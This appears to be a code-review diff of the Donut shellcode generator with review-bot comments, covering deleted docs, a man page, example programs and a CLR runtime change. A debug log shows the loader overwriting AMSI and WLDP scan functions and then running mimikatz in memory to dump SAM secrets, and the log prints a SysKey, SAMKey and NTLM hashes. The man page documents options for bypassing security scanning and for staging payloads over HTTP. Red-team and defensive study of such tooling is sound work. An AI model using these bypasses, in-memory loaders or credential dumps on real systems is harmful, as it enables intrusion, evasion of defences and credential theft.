DEBUG: donut.c:289:unmap_file(): Releasing compressed data.
DEBUG: donut.c:294:unmap_file(): Unmapping input file.
DEBUG: donut.c:299:unmap_file(): Closing input file.
DEBUG: donut.c:1580:DonutDelete(): Leaving.
</pre>
<p>If successfully created, there should now be a file called "instance" in the same directory as the loader. Pass the instance file as a parameter to loader.exe which should also be in the same directory.</p>
<pre>
C:\hub\donut>loader instance
Running...
DEBUG: loader/loader.c:109:MainProc(): Maru IV : 546E2FF018FD2A54
DEBUG: loader/loader.c:112:MainProc(): Resolving address for VirtualAlloc() : E445DF6F06219E85
DEBUG: loader/loader.c:116:MainProc(): Resolving address for VirtualFree() : C6C992D6040B85A8
DEBUG: loader/loader.c:120:MainProc(): Resolving address for RtlExitUserProcess() : E20BCE2C11E82C7B
DEBUG: loader/loader.c:129:MainProc(): VirtualAlloc : 00007FFFD1DAA190 VirtualFree : 00007FFFD1DAA180
DEBUG: loader/loader.c:131:MainProc(): Allocating 483718 bytes of RW memory
DEBUG: loader/loader.c:143:MainProc(): Copying 483718 bytes of data to memory 00000178FEA30000
DEBUG: loader/loader.c:147:MainProc(): Zero initializing PDONUT_ASSEMBLY
DEBUG: loader/loader.c:156:MainProc(): Decrypting 483718 bytes of instance
DEBUG: loader/loader.c:163:MainProc(): Generating hash to verify decryption
DEBUG: loader/loader.c:165:MainProc(): Instance : 33C49D5864287AEF | Result : 33C49D5864287AEF
DEBUG: loader/loader.c:172:MainProc(): Resolving LoadLibraryA
DEBUG: loader/loader.c:189:MainProc(): Loading ole32
DEBUG: loader/loader.c:189:MainProc(): Loading oleaut32
DEBUG: loader/loader.c:189:MainProc(): Loading wininet
DEBUG: loader/loader.c:189:MainProc(): Loading mscoree
DEBUG: loader/loader.c:189:MainProc(): Loading shell32
DEBUG: loader/loader.c:193:MainProc(): Resolving 48 API
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EF2C0663C0CDDC21
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for D40916771ECED480
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for E445DF6F06219E85
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for C6C992D6040B85A8
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 556BF46109D12C9E
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 032546126BB99713
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for DEB476FF0E3D71E8
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A0DD238846F064F4
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 03DE3865FC2DF17B
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 40FCB82879AAB610
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 954101E48C1D54F5
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 18669E0FDC3FD0B8
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EB6E7C47D574D9F9
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EFD410EF534D57C3
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A5AA007611CB6580
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for D5CEC16DD247A68A
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 6B140B7B87F27359
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for C2FA65C58C68FC6C
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for ED5A331176BB8DDA
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EA0D8BE258DC67DA
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 3A7BBDEAA1DC3354
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EEB92DFE18B7C306
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 687DD816E578C4E7
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for B0F95D86327741EC
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for BDD70375BB72B131
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for E74A4DD56C6B3154
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 527C502C0BC36267
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 055C3E8A4CF21475
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 4D1965E404D783BA
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for CC736E0143DB8F2A
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for C87BFE8578BB0049
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for FC7CC8D82764DFBF
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 6F6432B588D39C8D
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 2828FB8F68349704
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 9752F1AA167F8E79
DEBUG: peb.c:87:FindExport(): 9752f1aa167f8e79 is forwarded to api-ms-win-core-com-l1-1-0.CoInitializeEx
DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoInitializeEx)
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 8211344A519AF3BA
DEBUG: peb.c:87:FindExport(): 8211344a519af3ba is forwarded to api-ms-win-core-com-l1-1-0.CoCreateInstance
DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoCreateInstance)
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for FF0605E1258BEE44
DEBUG: peb.c:87:FindExport(): ff0605e1258bee44 is forwarded to api-ms-win-core-com-l1-1-0.CoUninitialize
DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoUninitialize)
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for D5CEDA5C642834D7
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A69EAF72442222A4
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 4DBA40D90962E1D6
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A1143A47656B2526
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 62FF88CDC045477E
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for E20BCE2C11E82C7B
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A469294ED1E1D8DC
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 61E26E7C5DD38D2C
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 145C8CF24F5EAF3E
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 12ACA3AD3CC20AF5
DEBUG: loader/loader.c:218:MainProc(): Module is embedded.
DEBUG: bypass.c:112:DisableAMSI(): Length of AmsiScanBufferStub is 36 bytes.
DEBUG: bypass.c:122:DisableAMSI(): Overwriting AmsiScanBuffer
DEBUG: bypass.c:137:DisableAMSI(): Length of AmsiScanStringStub is 36 bytes.
DEBUG: bypass.c:147:DisableAMSI(): Overwriting AmsiScanString
DEBUG: loader/loader.c:226:MainProc(): DisableAMSI OK
DEBUG: bypass.c:326:DisableWLDP(): Length of WldpQueryDynamicCodeTrustStub is 20 bytes.
DEBUG: bypass.c:350:DisableWLDP(): Length of WldpIsClassInApprovedListStub is 36 bytes.
DEBUG: loader/loader.c:232:MainProc(): DisableWLDP OK
DEBUG: loader/loader.c:239:MainProc(): Compression engine is 5
DEBUG: loader/loader.c:242:MainProc(): Allocating 1015240 bytes of memory for decompressed file and module information
DEBUG: loader/loader.c:252:MainProc(): Duplicating DONUT_MODULE
DEBUG: loader/loader.c:256:MainProc(): Decompressing 478726 -> 1013912
DEBUG: loader/loader.c:270:MainProc(): WorkSpace size : 1415999 | Fragment size : 5161
DEBUG: loader/loader.c:277:MainProc(): Decompressing with RtlDecompressBufferEx(XPRESS HUFFMAN)
DEBUG: loader/loader.c:302:MainProc(): Checking type of module
DEBUG: inmem_pe.c:103:RunPE(): Allocating 1019904 (0xf9000) bytes of RWX memory for file
DEBUG: inmem_pe.c:112:RunPE(): Copying Headers
DEBUG: inmem_pe.c:115:RunPE(): Copying each section to RWX memory 00000178FF170000
DEBUG: inmem_pe.c:127:RunPE(): Applying Relocations
DEBUG: inmem_pe.c:151:RunPE(): Processing the Import Table
DEBUG: inmem_pe.c:159:RunPE(): Loading ADVAPI32.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading Cabinet.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading CRYPT32.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading cryptdll.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading DNSAPI.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading FLTLIB.DLL
DEBUG: inmem_pe.c:159:RunPE(): Loading NETAPI32.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading ole32.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading OLEAUT32.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading RPCRT4.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading SHLWAPI.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading SAMLIB.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading Secur32.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading SHELL32.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading USER32.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading USERENV.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading VERSION.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading HID.DLL
DEBUG: inmem_pe.c:159:RunPE(): Loading SETUPAPI.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading WinSCard.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading WINSTA.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading WLDAP32.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading advapi32.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading msasn1.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading ntdll.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading netapi32.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading KERNEL32.dll
DEBUG: inmem_pe.c:182:RunPE(): Replacing KERNEL32.dll!ExitProcess with ntdll!RtlExitUserThread
DEBUG: inmem_pe.c:159:RunPE(): Loading msvcrt.dll
DEBUG: inmem_pe.c:182:RunPE(): Replacing msvcrt.dll!exit with ntdll!RtlExitUserThread
DEBUG: inmem_pe.c:182:RunPE(): Replacing msvcrt.dll!_cexit with ntdll!RtlExitUserThread
DEBUG: inmem_pe.c:182:RunPE(): Replacing msvcrt.dll!_exit with ntdll!RtlExitUserThread
DEBUG: inmem_pe.c:196:RunPE(): Processing Delayed Import Table
DEBUG: inmem_pe.c:204:RunPE(): Loading bcrypt.dll
DEBUG: inmem_pe.c:204:RunPE(): Loading ncrypt.dll
DEBUG: inmem_pe.c:319:RunPE(): Setting command line: MTFM lsadump::sam exit
DEBUG: inmem_pe.c:433:SetCommandLineW(): Obtaining handle for kernelbase
DEBUG: inmem_pe.c:449:SetCommandLineW(): Searching 2161 pointers
DEBUG: inmem_pe.c:458:SetCommandLineW(): BaseUnicodeCommandLine at 00007FFFD1609E70 : loader instance
DEBUG: inmem_pe.c:466:SetCommandLineW(): New BaseUnicodeCommandLine at 00007FFFD1609E70 : MTFM lsadump::sam exit
DEBUG: inmem_pe.c:483:SetCommandLineW(): New BaseAnsiCommandLine at 00007FFFD1609E60 : MTFM lsadump::sam exit
DEBUG: inmem_pe.c:530:SetCommandLineW(): Setting ucrtbase.dll!__p__acmdln "loader instance" to "MTFM lsadump::sam exit"
DEBUG: inmem_pe.c:543:SetCommandLineW(): Setting ucrtbase.dll!__p__wcmdln "loader instance" to "MTFM lsadump::sam exit"
DEBUG: inmem_pe.c:530:SetCommandLineW(): Setting msvcrt.dll!_acmdln "loader instance" to "MTFM lsadump::sam exit"
DEBUG: inmem_pe.c:543:SetCommandLineW(): Setting msvcrt.dll!_wcmdln "loader instance" to "MTFM lsadump::sam exit"
DEBUG: inmem_pe.c:323:RunPE(): Wiping Headers from memory
DEBUG: inmem_pe.c:332:RunPE(): Creating thread for entrypoint of EXE : 00000178FF2007F8
.#####. mimikatz 2.2.0 (x64) #18362 Aug 14 2019 01:31:47
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::sam
Domain : DESKTOP-B888L2R
SysKey : b43927eef0f56833c527ea951c37abc1
Local SID : S-1-5-21-1047138248-288568923-692962947
SAMKey : f1813d42812fcde9c5fe08807370613d
RID : 000001f4 (500)
User : Administrator
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
Hash NTLM: c288f1c30b232571b0222ae6a5b7d223
RID : 000003e9 (1001)
User : john
Hash NTLM: 8846f7eaee8fb117ad06bdd830b7586c
RID : 000003ea (1002)
User : user
Hash NTLM: 5835048ce94ad0564e29a924a03510ef
RID : 000003eb (1003)
User : test
mimikatz(commandline) # exit
Bye!
DEBUG: inmem_pe.c:338:RunPE(): Process terminated
DEBUG: inmem_pe.c:349:RunPE(): Erasing 1019904 bytes of memory at 00000178FF170000
DEBUG: inmem_pe.c:353:RunPE(): Releasing memory
DEBUG: loader/loader.c:343:MainProc(): Erasing RW memory for instance
DEBUG: loader/loader.c:346:MainProc(): Releasing RW memory for instance
DEBUG: loader/loader.c:354:MainProc(): Returning to caller
</pre>
<p>Obviously you should be cautious with what files you decide to execute on your machine.</p>
<h2 id="loader">13. Extending The Loader</h2>
<p>Donut was never designed with modularity in mind, however, a new version in future will try to simplify the process of extending the loader, so that others can write their own code for it. Currently, simple changes to the loader can sometimes require lots of changes to the entire code base and this isn't really ideal. If for any reason you want to update the loader to include additional functionality, the following steps are required.</p>
<h3>1. Declare the function pointers</h3>
<p>For each API you want the loader to use, declare a function pointer in loader/winapi.h. For example, the <code>Sleep</code> API is declared in its SDK header file as:</p>
<pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#400000; '>Sleep</span><span style='color:#808030; '>(</span><span style='color:#603000; '>DWORD</span> dwMilliseconds<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
</pre>
<p>The function pointer for this would be declared in loader/winapi.h as:</p>
<pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>(</span><span style='color:#603000; '>WINAPI</span> <span style='color:#808030; '>*</span>Sleep_t<span style='color:#808030; '>)</span><span style='color:#808030; '>(</span><span style='color:#603000; '>DWORD</span> dwMilliseconds<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
</pre>
<h3>2. Update the API string array and function pointer array</h3>
<p>At the moment, Donut resolves API using a 64-bit hash, which is calculated by the generator before being stored in the loader itself. In donut.c is a variable called <var>api_imports</var>, declared as an array of <code>API_IMPORT</code> structures. Each entry contains a case-sensitive API string and corresponding DLL string in lowercase. The <code>Sleep</code> API is exported by kernel32.dll, so if we want the loader to use Sleep, the <code>api_imports</code> must have the following added to it. This array is terminated by an empty entry.</p>
<pre style='color:#000000;background:#ffffff;'> <span style='color:#800080; '>{</span>KERNEL32_DLL<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>Sleep</span><span style='color:#800000; '>"</span><span style='color:#800080; '>}</span><span style='color:#808030; '>,</span>
</pre>
<p>Of course, KERNEL32_DLL used here is a symbolic constant for "kernel32.dll".</p>
<p>The <code>DONUT_INSTANCE</code> structure is defined in include/donut.h and one of the fields called <code>api</code> is defined as a union to hold three members. <var>hash</var> is an array of <code>uint64_t</code> integers to hold a 64-bit hash of each API string. <var>addr</var> is an array of <code>void*</code> pointers to hold the address of an API in memory and finally a structure holding all the function pointers. These pointers are placed in the same order as the API strings stored in <var>api_imports</var>. Currently, the <var>api</var> member can hold up to 64 function pointers or hashes, but this can be increased if required.</p>
<p>Where you place the API string in <var>api_imports</var> is entirely up to you, but it <em>must</em> be in the same order as where the function pointer is placed in the <code>DONUT_INSTANCE</code> structure.</p>
<h3>3. Update DLL names</h3>
<p>A number of DLL are already loaded by a process; ntdll.dll, kernel32.dll and kernelbase.dll. For everything else, the instance contains a list of DLL strings loaded before attempting to resolve the address of APIs. The following list of DLLs seperated by semi-colon are loaded prior to resolving API. If the API you want Donut loader to use is exported by a DLL not shown here, you need to add it to the list.</p>
<pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// required for each API used by the loader</span>
<span style='color:#004a43; '>#</span><span style='color:#004a43; '>define</span><span style='color:#004a43; '> DLL_NAMES </span><span style='color:#800000; '>"</span><span style='color:#0000e6; '>ole32;oleaut32;wininet;mscoree;shell32;dnsapi</span><span style='color:#800000; '>"</span>
</pre>
<h3>4. Calling an API</h3>
<p>If the API were successfully resolved, simply referencing the function pointer in a pointer to <code>DONUT_INSTANCE</code> is enough to invoke it. The following line of code shows how to call the <code>Sleep</code> API declared earlier.</p>
<pre style='color:#000000;background:#ffffff;'>inst<span style='color:#808030; '>-</span><span style='color:#808030; '>></span>api<span style='color:#808030; '>.</span><span style='color:#400000; '>Sleep</span><span style='color:#808030; '>(</span><span style='color:#008c00; '>1000</span><span style='color:#808030; '>*</span><span style='color:#008c00; '>5</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
</pre>
<p>Future plans for Donut are to provide multiple options for resolving API; Import Address Table (IAT), Export Address Table (EAT) and <a href="https://modexp.wordpress.com/2019/05/19/shellcode-getprocaddress/">Exception Directory</a> to name a few. It should also be much easier to write custom payloads using the loader.</p>
</body>
</html>
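Review bot: Deleting the whole devnotes document removes section 13, "Extending The Loader", which is the only written description of the contract between `api_imports` in donut.c, the function-pointer order inside `DONUT_INSTANCE.api`, and the `DLL_NAMES` list; anyone extending the loader after this commit has nothing to follow. If the text is stale, update it (the sample run it carries also embeds a SysKey, SAMKey and NTLM hashes from a test machine that could be scrubbed while editing), otherwise keep the file and move the deletion into its own commit with a rationale instead of a commit titled "test version".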

View File

@ -1,131 +0,0 @@
'\" t
.\" Title: donut
.\" Author: Odzhan
.\" Date: 12/24/2019
.\" Manual: Donut Reference Guide
.\" Source: Donut
.\" Language: English
.\"
.TH "DONUT" "1" "12/24/2019" "Donut v0.9.3" "Donut Reference Guide"
.SH NAME
donut \- shellcode generator
.SH SYNOPSIS
.B donut
[options]
.IR file ...
.SH DESCRIPTION
Donut, named after the dotNET framework, generates position-independent code for in-memory execution of VBScript, JScript, EXE/DLL files on the Microsoft Windows operating system. Both managed .NET assemblies and unmanaged/native EXE, DLL files are supported by the loader. There are dynamic and static libraries available for both Windows and Linux.
.SH MODULE OPTIONS
.TP
.BR \-n " " <name>
Module name for HTTP staging. If entropy is enabled, this is generated randomly.
.TP
.BR \-s " " <server>
URL for the HTTP server that will host a Donut module.
.TP
.BR \-e " " <level>
Entropy level. 1=None, 2=Generate random names, 3=Generate random names + use symmetric encryption (default).
.SH PIC/SHELLCODE OPTIONS
.TP
.BR \-a " " <arch>
Target architecture for loader : 1=x86, 2=amd64, 3=x86+amd64(default).
.TP
.BR \-b " " <level>
Behavior for bypassing AMSI/WLDP : 1=None, 2=Abort on fail, 3=Continue on fail.(default).
.TP
.BR \-o " " <path>
Output file to save loader. Default is "loader.bin".
.TP
.BR \-f " " <format>
Output format. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=PowerShell, 7=C#, 8=Hexadecimal.
.TP
.BR \-y " " <addr>
Create a new thread for loader and continue execution at address supplied. \fIaddr\fR must be in hexadecimal format.
.TP
.BR \-x " " <action>
Determines how the loader should exit. 1=exit thread (default), 2=exit process.
.SH FILE OPTIONS
.TP
.BR \-c " " <namespace.class>
Optional class name. (required for .NET DLL)
.TP
.BR \-d " " <name>
AppDomain name to create for .NET assembly. If entropy is enabled, this is generated randomly.
.TP
.BR \-m " " <method | api>
Optional method or function for DLL. (a method is required for .NET DLL)
.TP
.BR \-p " " <arguments>
Optional arguments/command line inside quotations for DLL method/function or EXE.
.TP
.BR \-w
Command line is passed to unmanaged DLL function in UNICODE format. (default is ANSI)
.TP
.BR \-r " " <version>
CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
.TP
.BR \-t
Run the entrypoint of an unmanaged/native EXE as a thread and wait for thread to end.
.TP
.BR \-z " " <engine>
Pack/Compress file. 1=None, 2=aPLib, 3=LZNT1, 4=Xpress.
Compression engines 3 abd 4 are only available on Windows.
.SH AUTHORS
Odzhan, TheWover
.SH DISCLAIMER
The authors are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct. In the event EDR or AV products are capable of detecting Donut via signatures or behavioral patterns, we will not update Donut to counter signatures or detection methods. To avoid being offended, please do not ask.
.SH COPYRIGHT
BSD 3-Clause License
Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
.SH "NOTES"
.IP " 1." 4
Loading .NET Assemblies From Memory.
.RS 4
\%https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/
.RE
.IP " 2." 4
Donut - Injecting .NET Assemblies as Shellcode
.RS 4
\%https://thewover.github.io/Introducing-Donut/
.RE
.IP " 3." 4
How Red Teams Bypass AMSI and WLDP for .NET Dynamic Code
.RS 4
\%https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/
.RE
.IP " 4." 4
In-Memory Execution of DLL
.RS 4
\%https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/
.RE
.IP " 5." 4
Data Compression
.RS 4
\%https://modexp.wordpress.com/2019/12/08/shellcode-compression/
.RE
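Review bot: Dropping the man page removes the documented behaviour of `-r <version>` ("MetaHeader used by default or v4.0.30319 if none available"), which is exactly the behaviour the `LoadAssembly` change elsewhere in this commit alters by forcing v4.0.30319 first and v2.0.50727 as the fallback. Update that option's description to match the new runtime selection rather than deleting the page, and fix the typo "abd" in the `-z` description while there.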

BIN
donut.exe Normal file

Binary file not shown.
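Review bot: A prebuilt `donut.exe` is committed as a binary blob; a compiled generator cannot be reviewed or diffed, is likely to be quarantined by endpoint protection on every clone, and bloats history each time it is rebuilt. Keep build artifacts out of the tree (add the pattern to `.gitignore`) and ship binaries as release assets instead.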

View File

@ -1,83 +0,0 @@
// dynamic example (doesn't work with .NET DLL)
// odzhan
#include "donut.h"
int main(int argc, char *argv[]) {
DONUT_CONFIG c;
int err;
// function pointers
DonutCreate_t _DonutCreate;
DonutDelete_t _DonutDelete;
DonutError_t _DonutError;
// need at least a file
if(argc != 2) {
printf(" [ usage: donut_dynamic <file>\n");
return 0;
}
// try load donut.dll or donut.so
#if defined(WINDOWS)
HMODULE m = LoadLibrary("donut.dll");
if(m != NULL) {
_DonutCreate = (DonutCreate_t)GetProcAddress(m, "DonutCreate");
_DonutDelete = (DonutDelete_t)GetProcAddress(m, "DonutDelete");
_DonutError = (DonutError_t) GetProcAddress(m, "DonutError");
if(_DonutCreate == NULL || _DonutDelete == NULL || _DonutError == NULL) {
printf(" [ Unable to resolve Donut API.\n");
return 0;
}
} else {
printf(" [ Unable to load donut.dll.\n");
return 0;
}
#else
void *m = dlopen("donut.so", RTLD_LAZY);
if(m != NULL) {
_DonutCreate = (DonutCreate_t)dlsym(m, "DonutCreate");
_DonutDelete = (DonutDelete_t)dlsym(m, "DonutDelete");
_DonutError = (DonutError_t) dlsym(m, "DonutError");
if(_DonutCreate == NULL || _DonutDelete == NULL || _DonutError == NULL) {
printf(" [ Unable to resolve Donut API.\n");
return 0;
}
} else {
printf(" [ Unable to load donut.so.\n");
return 0;
}
#endif
memset(&c, 0, sizeof(c));
// copy input file
lstrcpyn(c.input, argv[1], DONUT_MAX_NAME-1);
// default settings
c.inst_type = DONUT_INSTANCE_EMBED; // file is embedded
c.arch = DONUT_ARCH_X84; // dual-mode (x86+amd64)
c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP/ETW fails
c.headers = DONUT_HEADERS_OVERWRITE;// overwrite PE headers
c.format = DONUT_FORMAT_BINARY; // default output format
c.compress = DONUT_COMPRESS_NONE; // compression is disabled by default
c.entropy = DONUT_ENTROPY_DEFAULT; // enable random names + symmetric encryption by default
c.exit_opt = DONUT_OPT_EXIT_THREAD; // default behaviour is to exit the thread
c.thread = 1; // run entrypoint as a thread
c.unicode = 0; // command line will not be converted to unicode for unmanaged DLL function
// generate the shellcode
err = _DonutCreate(&c);
if(err != DONUT_ERROR_SUCCESS) {
printf(" [ Error : %s\n", _DonutError(err));
return 0;
}
printf(" [ loader saved to %s\n", c.output);
_DonutDelete(&c);
return 0;
}
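Review bot: This example is the only in-tree usage of the public `DonutCreate`/`DonutError`/`DonutDelete` entry points and of the `DONUT_CONFIG` defaults (`DONUT_ARCH_X84`, `DONUT_ENTROPY_DEFAULT`, `DONUT_OPT_EXIT_THREAD`), so deleting it leaves library users without a reference. If it no longer compiles, fix it (note that `lstrcpyn(c.input, ...)` sits outside the `#if defined(WINDOWS)` block, so the non-Windows path depends on donut.h supplying an equivalent) rather than removing it, or say in the commit message why the library API is no longer supported.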

View File

@ -1,45 +0,0 @@
// static example (doesn't work with .NET DLL)
// odzhan
#include "donut.h"
int main(int argc, char *argv[]) {
DONUT_CONFIG c;
int err;
// need at least a file
if(argc != 2) {
printf(" [ usage: donut_static <file>\n");
return 0;
}
memset(&c, 0, sizeof(c));
// copy input file
lstrcpyn(c.input, argv[1], DONUT_MAX_NAME-1);
// default settings
c.inst_type = DONUT_INSTANCE_EMBED; // file is embedded
c.arch = DONUT_ARCH_X84; // dual-mode (x86+amd64)
c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP/ETW fails
c.headers = DONUT_HEADERS_OVERWRITE;// overwrite PE headers
c.format = DONUT_FORMAT_BINARY; // default output format
c.compress = DONUT_COMPRESS_NONE; // compression is disabled by default
c.entropy = DONUT_ENTROPY_DEFAULT; // enable random names + symmetric encryption by default
c.exit_opt = DONUT_OPT_EXIT_THREAD; // default behaviour is to exit the thread
c.thread = 1; // run entrypoint as a thread
c.unicode = 0; // command line will not be converted to unicode for unmanaged DLL function
// generate the shellcode
err = DonutCreate(&c);
if(err != DONUT_ERROR_SUCCESS) {
printf(" [ Error : %s\n", DonutError(err));
return 0;
}
printf(" [ loader saved to %s\n", c.output);
DonutDelete(&c);
return 0;
}

View File

@ -1,7 +0,0 @@
# Generators
This folder contains Donut generators written in other languages than C. They are all developed by third-parties and are maintained separately, but are linked here as submodules. To clone Donut along with the submodules, run:
```
git clone https://github.com/TheWover/donut.git --recursive
```

@ -1 +0,0 @@
Subproject commit fcdcc35d591c954251d96642b93040527cee608d
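Review bot: Removing the generators README together with the gitlink `fcdcc35d591c954251d96642b93040527cee608d` drops the third-party generators with no replacement; if that is intended, the matching `.gitmodules` entry (not visible in this diff) has to go in the same commit, otherwise `git submodule` operations will fail on a stale entry, and any remaining documentation that still tells users to clone with `--recursive` should be corrected.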


View File

@ -48,12 +48,31 @@ BOOL LoadAssembly(PDONUT_INSTANCE inst, PDONUT_MODULE mod, PDONUT_ASSEMBLY pa) {
(LPVOID*)&pa->icmh);
if(SUCCEEDED(hr)) {
DPRINT("ICLRMetaHost::GetRuntime(\"%s\")", mod->runtime);
//DPRINT("ICLRMetaHost::GetRuntime(\"%s\")", mod->runtime);
mod->runtime[1]='4';
mod->runtime[5]='3';
mod->runtime[7]='3';
mod->runtime[8]='1';
mod->runtime[9]='9';
ansi2unicode(inst, mod->runtime, buf);
hr = pa->icmh->lpVtbl->GetRuntime(
pa->icmh, buf,
(REFIID)&inst->xIID_ICLRRuntimeInfo, (LPVOID)&pa->icri);
if (!SUCCEEDED(hr))
{
mod->runtime[1]='2';
mod->runtime[5]='5';
mod->runtime[7]='7';
mod->runtime[8]='2';
mod->runtime[9]='7';
ansi2unicode(inst, mod->runtime, buf);
